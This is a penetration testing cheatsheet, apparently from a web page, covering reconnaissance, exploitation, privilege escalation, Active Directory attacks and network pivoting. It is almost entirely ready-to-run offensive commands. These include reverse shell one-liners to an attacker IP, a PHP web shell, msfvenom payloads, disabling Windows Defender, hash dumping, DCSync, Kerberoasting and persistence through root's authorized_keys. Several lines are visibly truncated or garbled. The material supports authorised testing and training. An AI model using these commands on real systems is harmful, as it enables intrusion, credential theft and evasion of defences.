Penetration Testing Cheatsheet
Phase 1: Information Gathering & Enumeration
Gathering information and mapping the target environment, from external infrastructure to specific running services.
Infrastructure-based Enumeration
curl -s https://crt.sh/\?q\=<domain>\&output\=json | jq .
Use Certificate Transparency logs to find subdomains.
subfinder -d <domain.tld> -v
Discover subdomains using passive sources.
ffuf -w subdomains.txt:FUZZ -u https://FUZZ.<domain>
Brute-force subdomains using a wordlist.
gobuster dns -d <domain> -w <wordlist>
Brute-force subdomains using Gobuster.
for i in $(cat ips.txt); do shodan host $i; done
Scan a list of IP addresses using the Shodan CLI.
Host Scanning & Service Discovery
nmap -sV -sC -oA nmap/initial <TARGET_IP>
Standard Scan: Runs default scripts (-sC), probes for versions (-sV), and saves output.
nmap -p- --min-rate=1000 -oA nmap/all_ports <TARGET_IP>
All TCP Ports Scan: Scans all 65,535 TCP ports quickly.
nmap --script <script-name> -p <port> <TARGET_IP>
Run a specific Nmap script (e.g., smb-os-discovery.nse).
locate scripts/
Find available Nmap scripts on your system.
netcat -nv -w 1 -z <TARGET_IP> 22
Grab the banner of an open port using Netcat.
Web Enumeration
ffuf -w <wordlist>:FUZZ -u http://<TARGET>/FUZZ
Directory/File Fuzzing: The modern standard for finding web content.
gobuster dir -u http://<TARGET>/ -w <wordlist>
An alternative for directory and file brute-forcing.
whatweb <TARGET_IP>
Identify technologies, CMS, frameworks, and server software.
curl -IL <URL>
Grab website headers to identify server and framework versions.
curl http://<TARGET>/robots.txt
Check robots.txt for disallowed paths that may be interesting.
View Page Source
Ctrl+U in Firefox/Chrome
Service-Specific Enumeration
FTP (Port 21)
ftp <TARGET_IP>
Connect and interact with the FTP service.
nc -nv <TARGET_IP> 21
Connect with Netcat to manually issue FTP commands.
wget -m --no-passive ftp://anonymous:anonymous@<TARGET_IP>
Mirror (download) all files from an anonymous FTP server.
openssl s_client -connect <TARGET_IP>:21 -starttls ftp
Connect to FTP over an encrypted TLS channel (FTPS).
SMB (Ports 139, 445)
smbclient -N -L \\\\<TARGET_IP>\\
List SMB shares using a null session (no credentials).
smbclient \\\\<TARGET_IP>\\<share_name>
Connect to a specific SMB share.
smbmap -H <TARGET_IP>
Enumerate SMB shares and permissions.
crackmapexec smb <TARGET_IP> --shares -u '' -p ''
Use CrackMapExec to enumerate shares via a null session.
enum4linux-ng.py <TARGET_IP> -A
Comprehensive SMB enumeration (users, shares, policies, etc.).
rpcclient -U "" <TARGET_IP>
Interact with the target via RPC (e.g., for user enumeration).
samrdump.py <TARGET_IP>
Attempt to dump user information via SAMR.
NFS (Port 2049)
showmount -e <TARGET_IP>
Show available/mountable NFS shares from the target.
mount -t nfs <TARGET_IP>:/<share> /mnt/nfs -o nolock
Mount the remote NFS share to a local directory.
umount /mnt/nfs
Unmount the NFS share.
DNS (Port 53)
dig any <domain> @<nameserver>
Request ANY record type from a specific nameserver.
dig axfr <domain> @<nameserver>
Attempt a Zone Transfer: Can dump all DNS records for the domain.
dnsenum --dnsserver <ns> -f <wordlist> <domain>
Perform brute-forcing and other enumeration checks.
SMTP (Port 25)
telnet <TARGET_IP> 25
Manually connect to the SMTP server to issue commands.
nmap <TARGET_IP> -p25 -sV --script smtp*
Run all Nmap SMTP scripts against the target.
for u in $(cat u.txt); do echo VRFY $u | nc -nvw 1 <IP> 25; done
Enumerate valid users by piping a list to the VRFY command.
IMAP (143, 993) & POP3 (110, 995)
openssl s_client -connect <TARGET_IP>:imaps
Connect to the secure IMAPS service.
openssl s_client -connect <TARGET_IP>:pop3s
Connect to the secure POP3S service.
curl -v -k 'imaps://<URL>' --user <user>:<pass>
Log in to IMAPS service using cURL to test credentials.
Common IMAP Commands (after connecting):
a LOGIN user pass,a LIST "" *,a SELECT INBOX,a FETCH <ID> all,a LOGOUTCommon POP3 Commands (after connecting):
USER user,PASS pass,STAT,LIST,RETR <id>,QUIT
SNMP (Port 161)
snmpwalk -v2c -c <community> <TARGET_IP>
Query all OIDs (Object Identifiers) using a known community string.
onesixtyone -c community-strings.txt <TARGET_IP>
Brute-force SNMP community strings from a dictionary file.
SQL Databases (MySQL 3306, MSSQL 1433, Oracle 1521)
nmap -p3306 -sV --script mysql* <TARGET_IP>
Enumerate MySQL with Nmap scripts.
mysql -u <user> -p<pass> -h <TARGET_IP>
Connect to a MySQL server.
nmap -p1433 -sV --script ms-sql* <TARGET_IP>
Enumerate MSSQL with Nmap scripts.
mssqlclient.py <user>@<TARGET_IP> -windows-auth
Connect to MSSQL using Windows Authentication with Impacket.
python3 ./odat.py all -s <TARGET_IP>
Perform a full enumeration scan on an Oracle Database.
sqlplus <user>/<pass>@<TARGET_IP>/<db>
Connect to an Oracle database.
Common SQL Commands:
SHOW DATABASES;,USE <database>;,SHOW TABLES;,SELECT * FROM <table>;MSSQL xp_cmdshell:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; xp_cmdshell 'whoami';
Remote Management
SSH
ssh-audit.py <TARGET_IP>
Audit SSH server configuration for security issues.
ssh <user>@<TARGET_IP> -i private.key
Log in to SSH using a private key.
RDP
nmap -p3389 -sV --script rdp-* <TARGET_IP>
Enumerate RDP with Nmap scripts.
xfreerdp /u:<user> /p:<pass> /v:<TARGET_IP>
Connect to an RDP server from Linux.
WinRM
evil-winrm -i <TARGET_IP> -u <user> -p <password>
Connect to a target with a full-featured PowerShell session.
WMI
wmiexec.py <user>:"<pass>"@<TARGET_IP> "whoami"
Execute commands over WMI using Impacket.
Export to Sheets
Phase 2: Gaining Access (Exploitation)
Leveraging vulnerabilities to gain an initial foothold.
Exploit Research & Execution
searchsploit <service> <version>
Search the local Exploit-DB database for public exploits.
msfconsole
Start the Metasploit Framework.
search <exploit_name>
Search for exploits within Metasploit.
use <exploit_module_path>
Load a specific Metasploit module.
show options
Show the required options for the loaded module.
set RHOSTS <TARGET_IP>
Set the remote host (target) IP address.
check
Test if the target is likely vulnerable without exploiting.
exploit / run
Execute the exploit against the target.
Listeners & Shells
Setting up a Listener
nc -lvnp <PORT>
Start a Netcat listener to catch a reverse shell.
rlwrap nc -lvnp <PORT>
Use rlwrap for a better shell with history and arrow-key support.
Reverse Shell Payloads
Bash
bash -c 'bash -i >& /dev/tcp/<YOUR_IP>/<PORT> 0>&1'
Netcat
`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f
PowerShell
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('<YOUR_IP>',<PORT>);..." (shortened for brevity)
Python
python -c 'import pty; pty.spawn("/bin/bash")'
PHP Web Shell
echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.php
Connecting to Shells
nc <TARGET_IP> <PORT>
Connect to a bind shell listening on the target.
curl http://<TARGET>/shell.php?cmd=id
Execute a command using an uploaded web shell.
MSFvenom Payload Generation
Linux
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
Windows
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
Web (PHP)
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
Web (WAR)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
Phase 3: Post-Exploitation & Privilege Escalation
Actions taken after gaining initial access to escalate privileges and gather more information.
Shell Stabilisation & TTY Upgrade
1. Spawn TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
Use Python to get a better shell. script /dev/null -c bash is an alternative.
2. Background
Ctrl+Z
Background the current shell session.
3. Set Term
stty raw -echo; fg
On your attacker machine, set terminal to raw mode, then foreground the shell. Hit enter.
4. Set Vars
export TERM=xterm-256color; export SHELL=bash
In the target shell, set environment variables for a full-featured terminal.
File Transfers
HTTP Server
python3 -m http.server 80
wget http://<ATTACKER_IP>/file or curl -o file http://<ATTACKER_IP>/file
SCP
scp local_file user@<TARGET_IP>:/tmp
scp user@<ATTACKER_IP>:/path/file /tmp
PowerShell
(Serve file via HTTP)
Invoke-WebRequest http://<IP>/file.exe -OutFile C:\Temp\file.exe
Certutil
(Serve file via HTTP)
certutil.exe -urlcache -split -f http://<IP>/file.exe C:\Temp\file.exe
Base64
base64 shell.sh -w 0
(Copy paste) `echo <base64_string>
Linux Privilege Escalation
sudo -l
Crucial: Check what commands you can run as root or other users without a password.
find / -type f -perm -04000 -ls 2>/dev/null
Find SUID binaries. Check GTFOBins for exploitation methods.
./linpeas.sh / ./lse.sh
Run automated enumeration scripts to find privesc vectors.
sudo su -
Switch to root user if (ALL : ALL) ALL is present in sudo -l.
ssh-keygen -f key
Create an SSH key pair.
echo "<public_key>" >> /root/.ssh/authorized_keys
Add your public key to root's authorized keys if you have write access.
ssh root@<TARGET_IP> -i key
SSH in as root using your generated private key.
Windows Privilege Escalation & Post-Exploitation
whoami /priv
Check for enabled privileges, especially SeImpersonatePrivilege.
systeminfo
Check OS version and hotfixes for missing patches (kernel exploits).
accesschk.exe -uwcqv "Authenticated Users" *
Use Sysinternals tools to find weak folder/file permissions.
Get-MpComputerStatus
Check the status of Windows Defender.
Set-MpPreference -DisableRealtimeMonitoring $true
(Requires admin) Disable Windows Defender real-time monitoring.
Metasploit Meterpreter
sysinfo
Show system information.
getsystem
Attempt various techniques to escalate to SYSTEM privileges.
ps
List running processes.
migrate <PID>
Migrate into a more stable process (e.g., explorer.exe).
hashdump
Dump password hashes from the SAM database.
upload <local_path> <remote_path>
Upload a file to the target.
download <remote_path> <local_path>
Download a file from the target.
shell
Drop into a standard system command shell.
sessions -l
List active sessions.
sessions -i <ID>
Interact with a specific session.
Phase 4: Active Directory Attacks
Techniques specific to Windows Domain environments.
Initial AD Enumeration
responder -I <interface> -A
Passively listen for NetBIOS-NS/LLMNR requests to capture hashes.
./kerbrute_linux_amd64 userenum -d <DOMAIN> --dc <DC_IP> <userlist>
Enumerate valid usernames via Kerberos pre-authentication.
crackmapexec smb <DC_IP> --pass-pol
Enumerate the domain password policy.
ldapsearch -h <DC_IP> -x -b "DC=<domain>,DC=<local>"
Perform an anonymous LDAP query to enumerate domain objects.
bloodhound-python -u <user> -p <pass> -d <domain> -ns <DC_IP> -c all
Run the BloodHound collector to map the domain.
Credential Attacks & Lateral Movement
Password Spraying
crackmapexec smb <DC_IP> -u <userlist> -p '<password>'
Kerberoasting
GetUserSPNs.py <DOMAIN>/<USER> -request -outputfile hashes.txt
AS-REP Roasting
GetNPUsers.py <DOMAIN>/ -usersfile <userlist> -format hashcat -no-pass
Pass-The-Hash
impacket-psexec -hashes :<ntlm_hash> <user>@<TARGET_IP>
DCSync
secretsdump.py -just-dc-user <user_to_dump> <DOMAIN>/<USER>:<PASS>@<DC_IP>
PrintNightmare
python3 CVE-2021-1675.py <domain>/<user>:<pass>@<TARGET> '\\<ATTACKER_IP>\share\payload.dll'
PetitPotam + ADCS
ntlmrelayx.py -t http://<CA_SERVER>/certsrv/certfnsh.asp --adcs --template DomainController
Pivoting, Tunnelling & Port Forwarding
1. Internal Reconnaissance & Situational Awareness
Before pivoting, understand the network from the perspective of the compromised host.
Network Configuration & Routing
ifconfig / ip addr
(Linux) Display all current network interface configurations.
ipconfig /all
(Windows) Display all system network configurations, including DNS and DHCP servers.
netstat -r / route -n
(Linux/Windows) Display the local IP routing table to identify known networks and gateways.
Internal Host Discovery (Ping Sweeps)
Linux (Bash)
`for i in {1..254}; do (ping -c 1 172.16.5.$i
grep "bytes from" &) ;done`
Windows (CMD)
`for /L %i in (1,1,254) do @ping -n 1 -w 100 172.16.5.%i
find "Reply"`
PowerShell
`1..254
% {"172.16.5.): ($) -quiet)"}`
Metasploit
run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23
Use a Metasploit post-exploitation module to discover live hosts on internal subnets.
2. Port Forwarding & Tunnelling Techniques
Create pathways from your attacker machine into the target's internal network.
SSH Tunnelling (The Classic Method)
Requires an SSH server running on the pivot host.
Local Port Forwarding
ssh -L <LOCAL_PORT>:<TARGET_IP>:<TARGET_PORT> <user>@<PIVOT_IP> <br> ssh -L 3306:172.16.5.20:3306 user@<PIVOT_IP>
Forwards a port from your local machine through the pivot to a target machine. Useful for accessing a single service (e.g., a database on port 3306).
Remote Port Forwarding
ssh -R <REMOTE_PORT>:<TARGET_IP>:<TARGET_PORT> <user>@<PIVOT_IP> <br> ssh -R 8080:127.0.0.1:80 user@<PIVOT_IP>
Forwards a port from the pivot host back to your attacker machine. Useful for catching reverse shells from hosts that can only reach the pivot.
Dynamic Port Forwarding (SOCKS Proxy)
ssh -D <LOCAL_PORT> <user>@<PIVOT_IP> <br> ssh -D 9050 user@<PIVOT_IP>
Creates a versatile SOCKS proxy on your local machine that tunnels traffic through the pivot. This is the foundation for using tools like ProxyChains.
Metasploit Port Forwarding & Routing
Used when you have a Meterpreter session on the pivot host.
use post/multi/manage/autoroute
Sets up routing rules within Metasploit to route traffic for internal subnets through the active Meterpreter session.
portfwd add -l <local_port> -p <target_port> -r <target_ip>
(Local Forward) Forwards a local port on your attacker machine to a target in the internal network.
portfwd add -R -l <pivot_port> -p <attacker_port> -L <attacker_ip>
(Remote Forward) Forwards a port on the pivot host back to a listener on your attacker machine.
help portfwd
Displays all options for the portfwd command within Meterpreter.
Windows Native Port Forwarding
netsh interface portproxy add v4tov4 listenport=<p_port> connectaddress=<t_ip> connectport=<t_port>
Creates a persistent TCP port proxy on a Windows pivot host.
netsh interface portproxy show v4tov4
Displays the current port proxy configuration.
3. Proxying Traffic Through Tunnels
Once a SOCKS proxy is established, use these tools to route your other applications through it.
ProxyChains-NG (Linux)
tail -4 /etc/proxychains4.conf
Check the configuration file to ensure your proxy is listed (e.g., socks5 127.0.0.1 9050).
proxychains nmap -v -Pn -sT 172.16.5.19
Run an Nmap TCP scan through the proxy. -Pn is crucial as ICMP (ping) usually fails over proxies.
proxychains msfconsole
Start Metasploit with all its network traffic routed through the proxy.
proxychains xfreerdp /v:<TARGET_IP> /u:<user> /p:<pass>
Connect to an internal Windows host via RDP through the proxy.
Plink (Windows)
plink.exe -D <LOCAL_PORT> <user>@<PIVOT_IP>
(From Windows) Uses PuTTY's plink.exe to create an SSH-based SOCKS proxy, similar to ssh -D.
4. Advanced Tunnelling Tools
Versatile tools for creating robust tunnels and network relays.
Chisel
Server
./chisel server -v -p 1234 --socks5
A fast TCP/UDP tunnel over HTTP. Start the server on your attacker machine.
Client
./chisel client -v <ATTACKER_IP>:1234 socks
Run the client on the pivot host to connect back and establish the SOCKS proxy.
sshuttle
Client
sshuttle -r <user>@<PIVOT_IP> <INTERNAL_SUBNET> <br> sshuttle -r user@pivot 172.16.5.0/24 -v
"The poor man's VPN." Forwards all traffic for a specified subnet through an SSH session, without requiring admin rights on the pivot.
socat
Relay
socat TCP4-LISTEN:<l_port>,fork TCP4:<t_ip>:<t_port>
A powerful network relay. This example listens on a port and forwards all traffic to a target.
rpivot
Server
python2.7 server.py --proxy-port 9050 --server-port 9999
A reverse SOCKS proxy. The server runs on the attacker machine.
Client
python2.7 client.py --server-ip <ATTACKER_IP> --server-port 9999
The client runs on the pivot and connects out, creating a proxy for the attacker.
5. Covert Tunnelling (Firewall Evasion)
Use these when standard TCP/UDP traffic is blocked.
dnscat2
DNS
Server
sudo ruby dnscat2.rb --dns "host=<ATTACKER_IP>,domain=<domain.tld>"
Client
Start-Dnscat2 -DNSserver <ATTACKER_IP> -Domain <domain.tld> -Exec cmd
ptunnel-ng
ICMP
Server
sudo ./ptunnel-ng -r<PIVOT_IP> -R<PORT>
Client
sudo ./ptunnel-ng -p<PIVOT_IP> -l<LOCAL_PORT> -r<PIVOT_IP> -R<REMOTE_PORT>
6. Pivoting Workflow & Supporting Commands
Essential commands for transferring payloads and managing connections during a pivoting engagement.
Verify Tunnel
netstat -antp | grep <PORT>
On your attacker machine, verify that your local port forward or SOCKS proxy is listening.
Scan via Tunnel
nmap -v -sV -p1234 localhost
Scan the local port you forwarded to enumerate the service on the internal target.
Payload Gen
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<PIVOT_IP> ...
When generating a payload for a host inside the network, LHOST must be an IP the target can reach (often the pivot's IP).
File Transfer
scp payload.exe user@<PIVOT_IP>:~
Use scp to transfer tools and payloads to the pivot machine.
python3 -m http.server 8123
Start a quick web server on the pivot machine to serve payloads to other internal hosts.
Invoke-WebRequest -Uri "http://<PIVOT_IP>:8123/p.exe" -OutFile "p.exe"
Use PowerShell on an internal Windows host to download a payload from the pivot.
Last updated